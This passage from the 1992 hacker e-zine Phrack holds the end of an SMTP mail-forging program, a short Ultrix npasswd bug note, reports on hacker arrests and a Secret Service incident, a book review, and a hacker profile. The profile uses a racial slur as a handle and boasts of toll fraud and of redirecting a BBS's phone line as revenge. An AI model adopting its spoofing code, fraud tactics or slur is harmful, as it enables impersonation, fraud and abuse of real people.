  792.       gets(text);
  793.  
  794.       /* Connect to standard SMTP port. */
  795.       file_d = openSock(text,25);
  796.  
  797.       if (file_d < 0) {
  798.             printf("Error connecting to SMTP host.\n");
  799.             perror("smtp_connect");
  800.             exit(0);
  801.       }
  802.  
  803.       printf("\n\n[+ Connected to SMTP host %s +]\n",text);
  804.  
  805.       sleep(1);
  806.  
  807.       getAndSendFrom(file_d);
  808.  
  809.       getAndSendTo(file_d);
  810.  
  811.       getAndSendMsg(file_d);
  812.  
  813.       sprintf(text,"QUIT\n");
  814.       write(file_d,text,strlen(text));
  815.  
  816.     /* Here we just print out all the text we got from the SMTP
  817.        Host.  Since this is a simple program, we didnt need to do
  818.        anything with it. */
  819.  
  820.     printf("[Session Message dump]:\n");
  821.       while(read(file_d,text,78) > 0)
  822.             printf("%s\n",text);
  823.       close(file_d);
  824. }
  825. ----- End file fm.c
  826. _______________________________________________________________________________
  827.  
  828. From: Andy Panda-Bear
  829. Date: September 25, 1992
  830. Subject: Phrack on the move
  831.  
  832. To Whom It May Concern:
  833.  
  834. I love reading your Phrack articles and find them very, very informative as
  835. well as helpful.  I was wondering in you've ever or plan to put together a
  836. compendium of related articles.  For instance, you could make a Phrack guide to
  837. telephony and include all telephone/telecommunications articles.  Perhaps a
  838. "Phrack Guide to UNIX" or "Phrack Guide to Internet" could be produced.  It
  839. could have reprints of past articles along with commentaries by individuals who
  840. care to share their knowledge.  Anyway it's just something to think about.
  841.  
  842. Thanks for many megabytes of useful info and keep it coming.
  843.  
  844.       Later,
  845.  
  846.       Andy Panda-Bear
  847.  
  848. ----------
  849.  
  850.  Computer Underground Publications Index
  851.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  852.  by Amadeus
  853.  
  854. I just finished the new edition of the Phrack Index, now called the Computer
  855. Underground Publications Index since it now includes the issues of the Legion
  856. of Doom Tech Journals and Informatik.
  857.  
  858. You can get it from ftp.uu.net as /tmp/CUPindex
  859.  
  860. I have already sent it to da folks at CUD so that they may enter it into their
  861. archives.
  862.  
  863. The CUP has been updated to included all the Phracks up to 40.
  864.  
  865. C'ya
  866.  
  867. Amadeus
  868. _______________________________________________________________________________
  869.  
  870.  Pirates v. AT&T: Posters                                        August 8, 1992
  871.  ~~~~~~~~~~~~~~~~~~~~~~~~
  872.  by Legacy Irreverent (legacy@cpu.cyberpnk1.sai.com)
  873.  
  874. On May 24 1992, two lone Pirates, Legacy of CyberPunk System, and Captain
  875. Picard of Holodeck, had finally had enough of AT&T.  Together, they traveled to
  876. the AT&T Maintenance Facility, just west of Goddard, Kansas, and claimed the
  877. property in the name of Pirates and Hackers everywhere.  They hoisted the Jolly
  878. Roger skull and crossbones high on the AT&T flagpole, where it stayed for 2
  879. days until it was taken down by security.
  880.  
  881. This event was photographed and videotaped by EGATOBAS Productions, to preserve
  882. this landmark in history.  And now you can witness the event.  For a limited
  883. time we are offering a 11" x 17" full color poster of the Jolly Roger Pirate
  884. flag flying high over AT&T, with the AT&T logo in plain view, with the caption;
  885. "WE CAME, WE SAW, WE CONQUERED."  These are $5.50 each and are laminated.
  886.  
  887. Also available, by request is a 20" x 30" full color photograph, and a cotton
  888. T-shirt with the same full color picture on the front, for $20 each.
  889.  
  890. If you are interested in purchasing any of the above items, simply send check
  891. or money order for the amount to:
  892.  
  893. CyberPunk System
  894. P.O. Box 771027
  895. Wichita, KS  67277-1072
  896.  
  897. A GIF of this is also available from CyberPunk System, 1:291/19, 23:316/0,
  898. 72:708/316, 69:2316/0.  FREQ magicname PIRATE
  899.  
  900. Any questions, send them to Legacy@cpu.cyberpnk1.sai.com
  901.  
  902. _______________________________________________________________________________
  903.  
  904.  Ultrix 4.2 Bug
  905.  ~~~~~~~~~~~~~~
  906.  By Krynn
  907.  
  908. A bug was discovered in Ultrix 4.2 upgrade version.  It involves npasswd, and
  909. root.  It is quite simple, and a patch/fix is available.  Here is a description
  910. of the hole:
  911.  
  912. Sys Admin's username:  mradmin
  913. Any user's username :  mruser
  914.  
  915. Okay, mruser has forgotten his password, which isn't good.  Mruser goes to
  916. mradmin and asks mradmin to change his password to newpass.  Mradmin does so.
  917.  
  918. Mradmin now will su to root, and npasswd mruser.  He will enter mruser's new
  919. password, newpasswd.  It will appear in the /etc/passwd that mruser's password
  920. is a "*" (shadowed), and that it has been changed, but it hasn't.
  921.  
  922. The password changed was root's, meaning root's password is now newuser.
  923.  
  924. A fix is available via anonymous ftp at:
  925.  
  926. black.ox.ac.uk /src/npasswd.enhanced.shar.Z
  927.  
  928. The original is there as /src/npasswd jpl.tar.Z
  929. _______________________________________________________________________________
  930.  
  931.  PumpCon Hosed                                                 November 5, 1992
  932.  ~~~~~~~~~~~~~
  933.  by Phil "The Outlander"
  934.  
  935. PumpCon '92 was held this past weekend at the Westchester Courtyard by
  936. Marriott, and was shut down in spades.
  937.  
  938. It began like any typical hacker/phreak/cyberpunk's convention, with lots of
  939. beer, lots of shooting the bull, and lots of people from around the country,
  940. except that the guests got sloppy, stupid, noisy, and overconfident.
  941.  
  942. The manager of the hotel, accompanied by three town of Greenborough police
  943. officers, entered the room at approximately 10pm on Saturday.  The manager had
  944. received complaints about noise and vandalism from some of the hotel's other
  945. guests.  She claims to have tried to call the room several times before
  946. physically entering, but the room's telephone line was consistently busy.
  947.  
  948. The police officers noticed the multiple open (and empty) beer bottles
  949. scattered around the room and were gearing up to make some arrests for
  950. "Unlawful Possession of Alcoholic Beverages by Underage Persons" when one of
  951. the policemen spotted an Amiga, connected to a US Robotics modem, which was in
  952. turn connected to the suite's phone line.  The "stolen" calling card was all
  953. the probable cause necessary to upgrade the charges to "Wire Fraud."
  954.  
  955. Everyone in the suite was detained for questioning.  Standard investigation
  956. procedure was followed.  The entire case was handled by local authorities,
  957. including the Westchester County DA.  To my knowledge, the FBI and Bell
  958. Security people were not called in (or if they were, it was after I was
  959. released).
  960.  
  961. Each detainee was body-searched for diskettes, hand-written notes about credit
  962. and computer services, autodialers, and the like.  The suite where PumpCon had
  963. taken place was also searched.  Hardware seized includes at least two Amigas
  964. with monitors, modems, and diskettes, and one AT&T dumb terminal with modem.
  965.  
  966. Each of the detainees was interviewed in turn.  Just before dawn on the morning
  967. of Sunday, November 1st, the police began making the actual arrests.  Four to
  968. eight people were arrested and taken to the local jail.
  969.  
  970. The rest of the detainees were released with no charges or arrests filed.
  971.  
  972. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  973.  
  974. And now on a personal note to anybody who is new to the world of hacking:
  975.  
  976. Many of the attendees to PumpCon '92 were just like me.  I was aware of the
  977. possible consequences of an arrest, but the full enormity of the possibilities
  978. hadn't sunk in.  Getting busted can really ruin your life, and I am unwilling
  979. to sacrifice my liberty and get a criminal record just for the thrill of
  980. hanging out with the "eleet."
  981.  
  982. I was personally terrified out of my skull and went right off any dreams I had
  983. of being some kind of big-time cyberpunk.  The law had us outgunned ten to one
  984. (literally and figuratively) and I as I write this on Monday night I still
  985. haven't stopped shaking.
  986.  
  987. To anyone who hasn't considered what it would be like to get seriously busted,
  988. I want you to try and picture the scene that night, and comes the dawn, a lot
  989. of the people you were partying with just twelve hours earlier are carted away
  990. in handcuffs to face an uncertain future.
  991.  
  992. The attendees of PumpCon, including myself and with few exceptions, were utter
  993. and complete fools.  They thought that they could act like jerks, bust up the
  994. hotel, and phreak off the room lines without bringing down the heat like a jet
  995. of molten lava.  They thought they were too smart to get caught.  They thought
  996. that they were immortal.  They thought wrong, and now some of them are going to
  997. pay for it.
  998.  
  999. I got lucky.  I was released, and I learned some invaluable lessons.
  1000.  
  1001. I can't stress enough to anybody out there who is treating the state of the
  1002. Hack like it's a big game:  You aren't going to get your marbles back when the
  1003. night is over.  The stakes are real.  Ask yourself if you can deal with the
  1004. possibilities of ruining your life before it's even begun.
  1005.  
  1006. Everyone must make their own decision.  You are only given this one chance to
  1007. bail out now; any others that come along are blessings from on high.
  1008.  
  1009. If you do decide to live in the computer underground, I can only offer this
  1010. advice:  Cover your a$$.  Do not act foolishly.  Do not associate with fools.
  1011. Remember that you are not immortal, and that ultimately there are no safety
  1012. nets.  Intelligence can't always save you.  Do not, in your arrogance, believe
  1013. that it will.  My time as a cyberpunk has been short and undistinguished but it
  1014. has taught me this much.
  1015.  
  1016. I'm not saying that you should not become a hacker.  If that is truly your
  1017. wish, then I'm not one to stop you.  I'm just warning you that when the fall
  1018. comes, it can come hard, and there's nobody who can help you when you've gone
  1019. far enough past the line.
  1020.  
  1021.      Phil "The Outlander"
  1022. _______________________________________________________________________________
  1023.  
  1024.  2600 Meeting Disrupted by Law Enforcement                    December 12, 1992
  1025.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1026.  by Emmanuel Goldstein (Editor of 2600 Magazine)
  1027.  
  1028. The following is a letter I wrote to the Washington Post in response to their
  1029. article about the incidents at the Pentagon City Mall on November 6, entitled,
  1030. "Hackers Allege Harassment at Mall" (dated November 13, page A1).  Their
  1031. article failed to focus on the startling revelation of federal government
  1032. involvement and the ominous implications of such an action.  The article also
  1033. does little to lessen the near hysteria that is pumped into the general public
  1034. every time the word "hacker" is mentioned.
  1035.  
  1036. Let us take a good look at what has been confirmed so far.  A group of computer
  1037. hackers gathered at a local mall as they do once a month.  Similar meetings
  1038. have been going on in other cities for years without incident.  This gathering
  1039. was not for the purposes of causing trouble and nobody has accused the hackers
  1040. of doing anything wrong.  Rather, the gathering was simply a place to meet and
  1041. socialize.  This is what people seem to do in food courts and it was the
  1042. hackers' intention to do nothing more.
  1043.  
  1044. When mall security personnel surrounded the group and demanded that they all
  1045. submit to a search, it became very clear that something bizarre was happening.
  1046. Those who resisted were threatened with arrest.  Everyone's names were written
  1047. down, everyone's bags gone through.  One person attempted to write down the
  1048. badge numbers of the people doing this.  The list was snatched out of his hand
  1049. and ripped to pieces.  Another hacker attempted to catch the episode on film.
  1050. He was apprehended and the film was ripped from his camera.  School books,
  1051. notepads, and personal property were seized.  Much of it has still not been
  1052. returned.  The group was held for close to an  hour and then told to stay out
  1053. of the mall or be arrested.
  1054.  
  1055. This kind of treatment is enough to shock most people, particularly when
  1056. coupled with the overwhelming evidence and eyewitness accounts confirming no
  1057. unusual or disruptive behavior on the part of the group.  It is against
  1058. everything that our society stands for to subject people to random searches and
  1059. official intimidation, simply because of their interests, lifestyles, or the
  1060. way they look.  This occurrence alone would warrant condemnation of a blatant
  1061. abuse of power.  But the story doesn't end there.
  1062.  
  1063. The harassment of the hackers by the mall police was only the most obvious
  1064. element.  Where the most attention should be focused at this point is on the
  1065. United States Secret Service which, according to Al Johnson, head of mall
  1066. security, "ramrodded" the whole thing.  Other media sources, such as the
  1067. industry newsletter Communications Daily, were told by Johnson that the Secret
  1068. Service was all over the mall that day and that they had, in effect, ordered
  1069. the harassment.  Arlington police confirm that the Secret Service was at the
  1070. mall that day.
  1071.  
  1072. It is understood that the Secret Service, as a branch of the Treasury
  1073. Department, investigates credit card fraud.  Credit card fraud, in turn, can be
  1074. accomplished through computer crime.  Some computer hackers could conceivably
  1075. use their talents to accomplish computer crime.  Thus we arrive at the current
  1076. Secret Service policy, which appears to treat everybody in the hacker world as
  1077. if they were a proven counterfeiter.  This feeling is grounded in
  1078. misperceptions and an apprehension that borders on panic.  Not helping the
  1079. situation any is the ever-present generation gap -- most hackers are young and
  1080. most government officials are not.
  1081.  
  1082. Apart from being disturbed by the gross generalizations that comprise their
  1083. policy, it seems a tremendous waste of resources to use our Secret Service to
  1084. spy on public gatherings in shopping malls.  It seems certain to be a violation
  1085. of our rights to allow them to disrupt these meetings and intimidate the
  1086. participants, albeit indirectly.  Like any other governmental agency, it is
  1087. expected that the Secret Service follow the rules and not violate the
  1088. constitutional rights of citizens.
  1089.  
  1090. If such actions are not publicly condemned, we will in effect be granting a
  1091. license for their continuance and expansion.  The incident above sounds like
  1092. something from the darkest days of the Soviet Union when human rights activists
  1093. were intimidated by government agents and their subordinates.  True, these are
  1094. technology enthusiasts, not activists.  But who they are is not the issue.  We
  1095. cannot permit governmental abuse of any person or group simply because they may
  1096. be controversial.
  1097.  
  1098. Why do hackers evoke such controversy?  Their mere presence is an inconvenience
  1099. to those who want so desperately to believe the emperor is wearing clothes.
  1100. Hackers have a tendency of pointing out the obvious inadequacies of the
  1101. computer systems we entrust with such a large and growing part of our lives.
  1102. Many people don't want to be told how flimsily these various systems are held
  1103. together and how so much personal data is readily available to so many.
  1104. Because hackers manage to demonstrate how simple it is to get and manipulate
  1105. this information, they are held fully responsible for the security holes
  1106. themselves.
  1107.  
  1108. But, contrary to most media perceptions, hackers have very little interest in
  1109. looking at other people's personal files.  Ironically, they tend to value
  1110. privacy more than the rest of us because they know firsthand how vulnerable it
  1111. is.  Over the years, hackers have gone to the media to expose weaknesses in our
  1112. credit reporting agencies, the grading system for New York City public schools,
  1113. military computer systems, voice mail systems, and even commonly used push
  1114. button locks that give a false sense of security.  Not one of these examples
  1115. resulted in significant media attention and, consequently, adequate security
  1116. was either delayed or not implemented at all.
  1117.  
  1118. Conversely, whenever the government chooses to prosecute a hacker, most media
  1119. attention focuses on what the hacker "could have done" had he been malicious.
  1120. This reinforces the inaccurate depiction of hackers as the major threat to our
  1121. privacy and completely ignores the failure of the system itself.
  1122.  
  1123. By coming out publicly and meeting with other hackers and non-hackers in an
  1124. open atmosphere, we have dispelled many of the myths and helped foster an
  1125. environment conducive to learning.  But the message we received at the Pentagon
  1126. City Mall tells us to hide, be secretive, and not trust anybody.  Perhaps
  1127. that's how the Secret Service wants hackers to behave.  But we are not
  1128. criminals and we refuse to act as such simply because we are perceived that way
  1129. by uninformed bureaucrats.
  1130.  
  1131. Regardless of our individual outlooks on the hacker issue, we should be
  1132. outraged and extremely frightened to see the Secret Service act as they did.
  1133. Whether or not we believe that hackers are decent people, we must agree that
  1134. they are entitled to the same constitutional freedoms the rest of us take for
  1135. granted.  Any less is tantamount to a very dangerous and ill-advised precedent.
  1136.  
  1137.      Emmanuel Goldstein
  1138.      Editor, 2600 Magazine -- The Hacker Quarterly (516)751-2600
  1139.  
  1140. (NOTE: 2600 Magazine coordinates monthly hacker meetings throughout the
  1141.        country.)
  1142. _______________________________________________________________________________
  1143.  
  1144.  Two New Hardcovers                                           November 24, 1992
  1145.  ~~~~~~~~~~~~~~~~~~
  1146.  by Alan J. Rothman (New York Law Journal)(Page 5)
  1147.  
  1148. During the opening sequence of the classic English television series "The
  1149. Prisoner," the lead character known only as Number 6 (brilliantly played by
  1150. Patrick McGoohan) is abducted and taken to a secret location called "The
  1151. Village."  He desperately pleads with his captors "What do you want?"  Their
  1152. grim response is "Information."  Through 17 thrilling episodes, his kidnappers
  1153. staged elaborate high-tech ruses to find out why he quit work as a spy.
  1154.  
  1155. Had this story been set in the 1990s rather than the 1960s, all The Village's
  1156. proprietors would have needed was a PC and a modem.  They could have assembled
  1157. a composite of Number 6's movements by cross-referencing records from any of
  1158. the commercial data bases containing the details of nearly everyone's daily
  1159. activities.  Then with a bit of ingenuity, they could have tried to steal even
  1160. more information by hacking into other restricted data systems.
  1161.  
  1162. No longer fiction, but common fact, the billowing growth in the computers and
  1163. telecommunications networks everywhere is generating urgent legal issues
  1164. regarding the content, usage and ownership of the data coursing through them.
  1165. Dilemmas have also surfaced concerning the responsibilities of the businesses
  1166. which gather, sift and repackage such information.  Indeed, a critical juncture
  1167. has now been reached where the basic constitutional rights of privacy and
  1168. expression are colliding with the ever-expanding reach of modern technology.
  1169.  
  1170. Two well-crafted books have recently been published which together frame the
  1171. spectrum of relevant individual rights issues in these areas with uncanny
  1172. symmetry.  Fortunately, neither degenerates into a "computers are bad"
  1173. jeremiad.  Rather, they portray an appropriate balance between the virtues of
  1174. computerization and disturbing cases of technological misuse for wrongful
  1175. commercial and governmental ends.
  1176.  
  1177. Presenting array of new forms of electronic encroachment on personal privacy is
  1178. Jeffrey Rothfeder's alarming new book, "Privacy for Sale: How Computerization
  1179. Has Made Everyone's Private Life an Open Secret" (Simon & Schuster, 224 pages,
  1180. $22).  He offers the chilling thesis that anyone can find out nearly anything
  1181. regarding anybody and there is nowhere left to hide.  He convincingly states
  1182. his case in a concise and insightful exploration of the trends and abuses in
  1183. the mass processing of personal data.
  1184.  
  1185. The fascinating mechanics of how and where information about virtually every
  1186. aspect of our lives is gathered and then computerized are extensively
  1187. described.  The most productive fonts include medical records, credit
  1188. histories, mortgage applications, subscription lists, phone records, driver's
  1189. licenses and insurance forms.  Yet notwithstanding the legitimate commercial
  1190. and regulatory reasons for providing these facts, the author carefully
  1191. documents another more deeply hidden and troubling consequence of volunteering
  1192. such information: It is constantly resold, combined with other sources and
  1193. reused without your knowledge or permission for purposes entirely different
  1194. from those you first intended.
  1195.  
  1196. Mr. Rothfeder alleges the most perilous result of these activities is the
  1197. growing and highly organized sales, integration and cross-matching of
  1198. databases.  Businesses and government entities now have sophisticated software
  1199. to generate complex demographic profiles about individuals, populations and
  1200. geographic areas.  In turn, these computer-generated syntheses are increasingly
  1201. used for invasive and discriminatory purposes.
  1202.  
  1203. Numerous examples of such misuse are cited, ranging from slightly annoying to
  1204. purely horrifying.  The astonishing breadth of this roster includes the sale of
  1205. driver's license information with height weight specifications to clothes
  1206. marketers for tall men and thin women, purchases of credit histories and
  1207. workmen's compensation claims reports by prospective employers who believe this
  1208. material is indicative of a job applicant's character, and the creation of
  1209. "propensity files" by federal agencies to identify people who have not
  1210. committed any offense but might likely be criminals.
  1211.  
  1212. Two additional problems pervade the trafficking of intimate information.
  1213. First, there is little or no federal legislation to effectively protect people
  1214. from certain problems presented in the book.  For example, the release of
  1215. medical records thought to be "confidential" is virtually unprotected.
  1216.  
  1217. Second, it can be extremely difficult to have false entries corrected before
  1218. they have a ripple effect on your other data.  Beyond the common tales of
  1219. frustration at clearing up a faulty credit report, Mr. Rothfeder relates the
  1220. case of a man denied any health insurance because his medical records contained
  1221. an erroneous report he was HIV positive.
  1222.  
  1223.  
  1224. JOURNEY IN CYBERSPACE
  1225.  
  1226. Turning to a much more accurate account, author Bruce Sterling takes readers
  1227. into the ethereal realm of "cyberspace" where computers, networks, and
  1228. electronic bulletin boards systems (BBS) are linked together by phone.  In his
  1229. first non-fiction work, "The Hacker Crackdown: Law and Disorder on the
  1230. Electronic Frontier" (Bantam, 328 pages, $23), he chronicles the U.S.
  1231. government's highly visible efforts in 1990 to prosecute "hackers" it suspected
  1232. of committing crimes by PC and modem.  However, Mr. Sterling distinguishes this
  1233. term as being more about active computer enthusiasts, most of whom have never
  1234. committed any wrongdoing.  The writer's other credits include some highly
  1235. regarded "cyberpunk" science fiction, where computer technology is central to
  1236. the plots and characters.
  1237.  
  1238. The "crackdown" detailed by the author began with the crash of AT&T's long-
  1239. distance phone system on January 15, 1990.  Although it has never been proven
  1240. that hackers were responsible, this event served as the final catalyst to spur
  1241. federal law enforcement agencies into concerted action against a suspected
  1242. underground of computer criminals.  A variety of counter-operations were
  1243. executed.  Most notable was Operation Sundevil the following May when agents
  1244. around the country seized 42 computer systems, 23,000 diskettes, and halted 25
  1245. BBS's where the government believed hackers were exchanging tips of the trade.
  1246.  
  1247. Some of the government's resulting prosecutions through their nationwide
  1248. efforts were moderately successful. However, the book's dramatic centerpiece is
  1249. the trial of Craig Neidorf (a.k.a. Knight Lightning).  Mr. Neidorf was a
  1250. contributor to Phrack, an electronic magazine catering to hackers, available on
  1251. various BBS's.
  1252.  
  1253. In January 1989, another hacker named "Prophet" transmitted a document he
  1254. pilfered from BellSouth's computers regarding the 911 emergency system to
  1255. Neidorf.  Together they edited the text, which Neidorf then published in
  1256. Phrack.  In July 1990, he was placed on trial for federal charges of entering a
  1257. fraudulent scheme with Prophet to steal this document.  The government alleged
  1258. it was worth $79,499 and that its publication threatened emergency operations.
  1259. To the prosecutor's dismay, the case was dropped when the defense proved the
  1260. same material was publicly available for only $13.
  1261.  
  1262. With insight and style, Mr. Sterling uses this and other events to cast
  1263. intriguing new spins on applicable civil liberties issues.
  1264.  
  1265. Are the constitutional guarantees of freedom of expression and assembly fully
  1266. extended to BBS dialogs and gatherings?  What degree of privacy can be expected
  1267. for personal data on systems which may be subject to surreptitious entry?  Are
  1268. hackers really breaking any laws when merely exploring new systems?  Is posting
  1269. a message or document on a BBS considered a "publication"?  Should all BBS's be
  1270. monitored just because of their potential for illegal activity?  What are the
  1271. responsibilities of BBS operators for the contents of, and access to, their
  1272. systems?
  1273.  
  1274. The efforts of Mitchell Kapor, the co-developer of Lotus 123 and now chairman
  1275. of ONtechnology, are depicted as a direct response to such issues raised by the
  1276. crackdown.  Mr. Kapor assembled a prominent group of fellow computer
  1277. professionals to establish the Electronic Frontier Foundation (EFF), dedicated
  1278. to education and lobbying for free speech and expression in electronic media.
  1279. As well, EFF has provided support to Craig Neidorf and others they consider
  1280. wrongly charged with computer crime.
  1281.  
  1282. Weighty legal matters aside, the author also embellishes his story with some
  1283. colorful hacker lore.  These denizens of cyberspace are mostly young men in
  1284. their late teens or early twenties, often fueled by junk food and propelled by
  1285. macho.  Perhaps their most amusing trait is the monikers they adopt --
  1286. Bloodaxe, Shadowhawk, and of course, Phiber Optik.
  1287.  
  1288. Someone else, a non-hacker involuntary given the pseudonym "Number 6," knew his
  1289. every act was continually being monitored and recorded against his will.  As a
  1290. manifestation of resistance to this relentless surveillance, he often bid
  1291. farewell to other citizens of the Village with a sarcastic "Be seeing you." 
  1292. Today, the offerings of authors Rothfeder and Sterling provide a resounding
  1293. "And you" as a form of rejoinder (often uttered by The Village's citizens as
  1294. well), to publicize the ironic diversity threats wrought by information
  1295. technology.
  1296.  
  1297. Number 6 cleverly managed to escape his fictional captivity in The Village
  1298. during the final (and mind-boggling) episode of The Prisoner.  However, based
  1299. on the compelling evidence presented in these two books, the protection of
  1300. individual rights in the reality of today's evolving "global village" of
  1301. computer networks and telecommunications may not be so neatly resolved.
  1302. _______________________________________________________________________________
  1303.  
  1304.                                 ==Phrack Inc.==
  1305.  
  1306.                    Volume Four, Issue Forty-One, File 3 of 13
  1307.  
  1308.                               ==Phrack Pro-Phile==
  1309.  
  1310.                           Created by Taran King (1986)
  1311.  
  1312. _______________________________________________________________________________
  1313.  
  1314.      Welcome to Phrack Pro-Phile.  Phrack Pro-Phile is created to bring info to
  1315. you, the users, about old or highly important/controversial people.  This
  1316. month, we bring to you certainly one of the most controversial people (and
  1317. handles) to ever emerge in the computer underground...
  1318.  
  1319.                                   Supernigger
  1320.                                   ~~~~~~~~~~~
  1321. _______________________________________________________________________________
  1322.  
  1323.  Personal
  1324.  ~~~~~~~~
  1325.            Handle:  Supernigger
  1326.          Call him:  SN
  1327.     Date of Birth:  Years ago
  1328.               Age:  Getting along in the years.
  1329.            Height:  Medium
  1330.            Weight:  Medium
  1331.   Computers owned:  Commodore Vic-20, C64, Amiga, 386 Compatible
  1332.  
  1333.      How did this handle originate?  Back in 1985, I had blueboxed to a bridge.
  1334. Someone on there, for some reason, decided that he didn't like me, and shouted,
  1335. "Get off, nigger!"  He then proceeded to knock me off with a 2600 Hz tone.  I
  1336. immediately called back with something "un-2600 hz-able" and, when he shouted,
  1337. "Get off nigger!" and blew 2600 hz, I then said, "I'm SUPERnigger, you can't
  1338. knock me off, I've got the POWER!!"  Fun, eh?
  1339.  
  1340.  
  1341.  How I Got Started
  1342.  ~~~~~~~~~~~~~~~~~
  1343.      Back in '82 or '83, I got a wonderful computer called a Commodore Vic-20.
  1344. With that, I wrote a few irrelevant programs and played "Gorf!" a lot.  Then, a
  1345. friend suggested that I get a Commodore C-64 and disk drive for all the RAD
  1346. WhErEz! it had.
  1347.  
  1348.        Needless to say, I was not disappointed.  Then a friend showed me a
  1349. 5-digit number you could put in after calling an access number, and it would
  1350. put a call through for you!  Imagine that!  This, I thought, was the key to
  1351. UNLIMITED WARES!
  1352.  
  1353.      Then, the new ware scene became tiresome and boring REAL quick.  I had
  1354. them all.  New ones.  Old ones.  Middle-aged ones.  I had wares coming out of
  1355. my ass.  Just when I was about to drop out of the scene, I saw a number posted
  1356. on a board for InterCHAT (201), a multi-line chat system.
  1357.  
  1358.      That's where the cavalcade of fun and interesting endeavors began.  That's
  1359. where I met Sharp Remob, Lord_foul (DP), Dark Wanderer and other members of
  1360. DPAK.
  1361.  
  1362.      Speaking of DPAK, the group was created when we found a glitch in the MCI
  1363. access # that allowed any 14-digit code to work.  We then made up the joke,
  1364. "Today at 2:00 PM, DPAK Agents cornered an MCI official and said, 'You WILL
  1365. give these people free calls!'" and proceeded to tell people about the glitch
  1366. ("DPAK" came from Mad Hacker 312, who, when asked about obtaining non-published
  1367. numbers, said, "Oh, you'd have to be a DPAK Agent to get that.").
  1368.  
  1369.      After that, DPAK was tracing people before Caller ID came out, finding and
  1370. creating bridges, setting up an 800 # for InterCHAT (actually 2 if you were
  1371. quick enough to catch the second one), putting out Sharp Remob's Social
  1372. Engineering file, and other things that I had better not mention (I would go
  1373. on, but I think I might frighten you.).
  1374.  
  1375.      I would have to say that I feel negatively toward "elite posers," people
  1376. who claim to know things with the sole purpose of trying to seem "cool."  These
  1377. are the people you see boasting about how long they have been around (which is
  1378. irrelevant), spurting out random acronyms when they have no idea how they are
  1379. actually used, and trying to make something complicated and mysterious out of
  1380. something mundane and simple.  For example:  "Hey dude, watch out, I may be
  1381. listening in on your line right now with a DAMT," or "Oh, I'll just use the DRT
  1382. trunk multiplexor to do a Random Interphase-seizure of the tandemized trunk."
  1383. (Barf!)
  1384.  
  1385.      Also, I think this government crackdown really sucks.  What sucks is the
  1386. fact that the government is going after big NAMES instead of big -CRIMES-.
  1387. Rather than stopping crimes, they just want to "show who's boss."  A lot of
  1388. innocent lives are being ruined.  In fact, after this issue of Phrack comes
  1389. out, I plan to lay VERY low because they will probably want to get me now that
  1390. my handle was in a phreak/hack publication.
  1391.  
  1392.  
  1393.  Interests
  1394.  ~~~~~~~~~
  1395.  
  1396.               Women:  Fast
  1397.                Cars:  Fast (VWs)
  1398.                Food:  Fast
  1399.               Music:  All kinds (Rap, Rock, Metal, you name it)
  1400. Favorite performers:  2 Live Crew
  1401.     Favorite author:  Lord Digital (the father of ELITE!ness)
  1402.       Favorite Book:  Nat!onal Enl!ghtener
  1403.  
  1404.  
  1405.  Most Memorable Experiences
  1406.  ~~~~~~~~~~~~~~~~~~~~~~~~~~
  1407.      "It works!  It works!!" -- when the 800 # for InterCHAT actually worked.
  1408. If you called it, you remember.  That took a lot of work...
  1409.      
  1410.      Also, at one point in time, every chat system in New Jersey was forwarded
  1411. to InterCHAT..  That was truly hilarious.  I strongly suggest, at this point,
  1412. that everyone refrain from attempting these things.  The consequences are a bit
  1413. more serious now.  But if you must, be VERY very careful.
  1414.  
  1415.      ...And, I would like to take this opportunity to clear up the "Free World
  1416. II Incident" and other vague and unclear statements chronicled in Phrack 28.
  1417. First of all, I -DID NOT- crash Black Ice BBS.  In fact, some hick from Texas
  1418. already stated to me that he wrote my name on the BBS when it was crashed.  The
  1419. same hick tends to lie and spread rumors a lot, so I don't actually know if it
  1420. was him that wrote my name.  Suffice to say that I didn't crash it.
  1421.  
  1422.      Secondly, and most important, Free World II BBS was forwarded to InterCHAT
  1423. because Major Havoc was a complete and total ASSHOLE.
  1424.  
  1425.      I called his system and applied for access.  When I tried to get back on,
  1426. I found that my application had been deleted without so much as a notification,
  1427. so I thought that the BBS hadn't saved it correctly and applied again.  I found
  1428. the BBS hadn't saved it correctly a second time, and when I tried to fill out
  1429. the application once more, Major Havoc broke in and typed things like "Get the
  1430. fuck off here" and "Hang the fuck up."  I typed "Fine, have it your way" and
  1431. proceeded to forward his BBS # to InterCHAT.  You can't just treat people like
  1432. that and expect nothing to happen.
  1433.  
  1434.      The opening message on InterCHAT said:  "Until Major Havoc learns the
  1435. meaning of the word TACT (dealing with people in a non-offensive manner), his
  1436. BBS has been put to better use."
  1437.  
  1438.      (I had called the BBS in the first place to try to clear up wild rumors
  1439. that The Blade had said were being tossed about on there).
  1440.  
  1441.      I hope this has cleared things up.
  1442.  
  1443.  
  1444.  Some People To Mention
  1445.  ~~~~~~~~~~~~~~~~~~~~~~
  1446.  
  1447. Sharp Remob :       He showed me the wonders of Social Engineering.  He is
  1448.                     making the big dollars now.
  1449.  
  1450. Lord_foul :         I never realized how many people he was in contact with.
  1451.                     Some pretty heavy hitters.  He never let on how much he
  1452.                     knew.
  1453.  
  1454. Applehead :         The best DJ in the phreak/hack world.  Truly, in mixing
  1455.                     records, no one is his equal.  Seems to be able to
  1456.                     mesmerize phone company employees into doing his bidding as
  1457.                     well.  Could these two things be related?
  1458.  
  1459. Meat Puppet :       "Money for nuthin, EVERYTHING for free."  Why anyone would
  1460.                     want 800 watts in their car I will never know.
  1461.  
  1462. Lung C00kiez :      He had the best conference ideas, like Want-Ad Fun and
  1463.                     Operator Frenzy.
  1464.  
  1465. *DETH*-2-*J00Z* :   So much for political correctness.  First person I know to
  1466.                     theorize how to trace people before Caller ID came out.
  1467.  
  1468. Dark Wanderer :     Works for Sun Microsystems now.  One of the few hackers I
  1469.                     know that has a technical computer-oriented career.
  1470.  
  1471. Krak Dealer :       Takes consciousness-altering to the level of an art form.
  1472.  
  1473. Squashed Pumpkin :  The enforcer.
  1474.  
  1475. DeeDee :            The only cool bridge chick.
  1476.  
  1477. Dr. Mike :          Cool guy when he's not threatening his girlfriend with a
  1478.                     knife.
  1479.  
  1480. Gatsby :            Gets the award for quick learner.
  1481.  
  1482. orpheus :           One of the true devotees of InterCHAT, and one of the few
  1483.                     people I know who is actually interested in HP-3000.
  1484.  
  1485. The whole InterCHAT crowd...  Made modeming fun.
  1486.  
  1487.      I should also mention a group of NYC individuals at this time.  I would
  1488. mention their names, but certain legal situations preclude that.  They showed
